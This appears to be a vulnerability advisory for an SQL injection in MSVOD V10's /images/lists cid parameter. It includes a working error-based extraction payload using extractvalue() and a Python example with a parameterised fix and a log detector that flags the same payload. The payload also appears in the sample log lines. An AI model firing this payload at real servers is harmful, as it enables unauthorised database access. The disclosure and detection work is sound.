MSVOD V10 – SQL Injection

MSVOD V10 – SQL Injection via /images/lists

The $cid parameter of /images/lists is taken from the request and placed into the SQL query unquoted and unvalidated.

Open the page: /images/lists?cid='

MySQL then returns a syntax error:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' or ms_atlas.class in (12,13,19,22,23,24,35)) ) LIMIT 1' at line 1

From the error text the failing statement can be reconstructed. The single quote from cid lands directly after `ms_atlas.class =`, which shows that the value is interpolated into an integer comparison without quoting or casting:

SELECT COUNT(*) AS tp_count FROM `ms_atlas` WHERE ( ms_atlas.status = 1 and ms_atlas.is_check=1 and (ms_atlas.class = ' or ms_atlas.class in (12,13,19,22,23,24,35)) ) LIMIT 1

Final payload (error-based extraction with extractvalue(): the concat() result starts with 0x7c, i.e. `|`, which is not a valid XPath expression, so MySQL echoes the database name, current user and @@version back in the "XPATH syntax error" message; `%20--%20` comments out the remainder of the statement):

Official demo:,extractvalue(rand(),concat(0x7c,database(),0x7c,user(),0x7c,@@version))%20desc%20--%20
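The following is an added example, not MSVOD's own code. It rebuilds the vulnerable COUNT statement from the error message above to show how a bare quote produces exactly the quoted SQL, shows the parameterised form a fix would use (assuming a DB-API driver with %s placeholders such as PyMySQL), and runs a small detector over constructed access-log lines to flag cid values that are not plain integers and name the error-based function when one is present. Table and column names come from the page; the log lines and the driver assumption are mine.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Class ids in the IN (...) list, copied from the error message on the page.
SIBLING_CLASSES = (12, 13, 19, 22, 23, 24, 35)

COUNT_SQL = (
    "SELECT COUNT(*) AS tp_count FROM `ms_atlas` WHERE "
    "( ms_atlas.status = 1 and ms_atlas.is_check=1 and "
    "(ms_atlas.class = {cid} or ms_atlas.class in ({ids})) ) LIMIT 1"
)


def build_count_query_vulnerable(cid: str) -> str:
    """Rebuild the failing statement the way the application evidently does:
    cid is dropped into the WHERE clause unquoted and unvalidated, so a bare
    quote (cid=') yields exactly the text quoted in the MySQL error."""
    return COUNT_SQL.format(cid=cid, ids=",".join(map(str, SIBLING_CLASSES)))


def build_count_query_safe(cid: str) -> tuple[str, tuple[int, ...]]:
    """Hardened form (assumption: a DB-API driver with %s placeholders).
    cid must be a plain integer and is bound as a parameter; the IN list is
    bound as well instead of being interpolated."""
    if not re.fullmatch(r"[0-9]{1,10}", cid):
        raise ValueError(f"cid must be a positive integer, got {cid!r}")
    placeholders = ",".join(["%s"] * len(SIBLING_CLASSES))
    sql = COUNT_SQL.format(cid="%s", ids=placeholders)
    return sql, (int(cid), *SIBLING_CLASSES)


# Error-based MySQL functions commonly abused to leak data through error text.
ERROR_BASED = re.compile(r"\b(extractvalue|updatexml)\s*\(", re.IGNORECASE)
REQUEST_LINE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/')


def find_injection_attempts(log_lines, param="cid"):
    """Scan combined-format access-log lines for /images/lists requests whose
    cid is not a plain integer. Returns (client_ip, decoded_cid, reason)."""
    hits = []
    for line in log_lines:
        m = REQUEST_LINE.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        if url.path != "/images/lists":
            continue
        for value in parse_qs(url.query, keep_blank_values=True).get(param, []):
            if re.fullmatch(r"[0-9]+", value):
                continue  # benign integer id
            func = ERROR_BASED.search(value)
            reason = (f"error-based via {func.group(1).lower()}()"
                      if func else "non-numeric cid")
            hits.append((line.split(" ", 1)[0], value, reason))
    return hits


# Constructed sample log lines (not real MSVOD traffic); the third carries
# the payload from the page.
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2024:10:00:01 +0000] "GET /images/lists?cid=12 HTTP/1.1" 200 5120',
    '203.0.113.7 - - [01/Jan/2024:10:00:09 +0000] "GET /images/lists?cid=%27 HTTP/1.1" 500 812',
    '203.0.113.7 - - [01/Jan/2024:10:00:15 +0000] "GET /images/lists?cid=,extractvalue(rand(),'
    'concat(0x7c,database(),0x7c,user(),0x7c,@@version))%20desc%20--%20 HTTP/1.1" 500 941',
    '198.51.100.4 - - [01/Jan/2024:10:01:00 +0000] "GET /index.php?cid=%27 HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    print(build_count_query_vulnerable("'"))
    print(build_count_query_safe("12"))
    for ip, cid, reason in find_injection_attempts(SAMPLE_LOG):
        print(f"{ip}  cid={cid!r}  {reason}")
```

The vulnerable builder is only there to make the data flow explicit: once an attacker controls text that sits to the right of `class =`, the whole remainder of the WHERE clause is theirs. The fix is to validate the id as an integer and bind it; the detector is the corresponding hunting query for logs where the application was already exposed.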